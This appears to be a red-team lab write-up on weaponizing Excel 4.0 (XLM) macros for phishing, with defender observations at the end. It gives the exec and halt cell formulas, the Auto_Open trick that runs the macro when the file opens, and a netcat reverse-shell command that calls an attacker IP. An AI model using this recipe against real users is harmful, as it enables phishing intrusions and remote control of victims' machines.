Phishing: XLM / Macro 4.0

Red Teaming Experiments

linkedin twitter patreon github

Search…

What is ired.team?

Pinned

Pentesting Cheatsheets

Active Directory & Kerberos Abuse

reversing, forensics & misc

Internals

Cloud

Neo4j

Dump Virtual Box Memory

AES Encryption Using Crypto++ .lib in Visual Studio C++

Reversing Password Checking Routine

Phishing: XLM / Macro 4.0

This lab is based on the research performed by Stan Hegt from Outflank.
Weaponization
A Microsoft Excel Spreadsheet can be weaponized by firstly inserting a new sheet of type "MS Execel 4.0 Macro":
We can then execute command by typing into the cells:
=exec("c:\shell.cmd")
=halt()
As usual, the contents of shell.cmd is a simple netcat reverse shell:
c:\shell.cmd
C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe
Note how we need to rename the A1 cell to Auto_Open if we want the Macros to fire off once the document is opened:
Excel 4.0 Macro Functions Reference (1).pdf
5MB
PDF
Excel 4.0 Macro Functions Reference.pdf
phishing-xlm.xlsm
8KB
Binary
XLM Phishing.xlsm
Execution
Opening the document and enabling Macros pops a reverse shell:
Note that XLM Macros allows using Win32 APIs, hence shellcode injection is also possible. See the original research link below for more info.
Observations
As usual, look for any suspicious children originating from under the Excel.exe:
Having a quick look at the file with a hex editor, we can see a suspicious string shell.cmd immediately, which is of course good news for defenders:
References
Old school: evil Excel 4.0 macros (XLM) | Outflank Blog
Outflank Blog

Phishing with MS Office

T1173: Phishing - DDE

Last modified 3yr ago

Copy link

On this page

Weaponization

Execution

Observations

References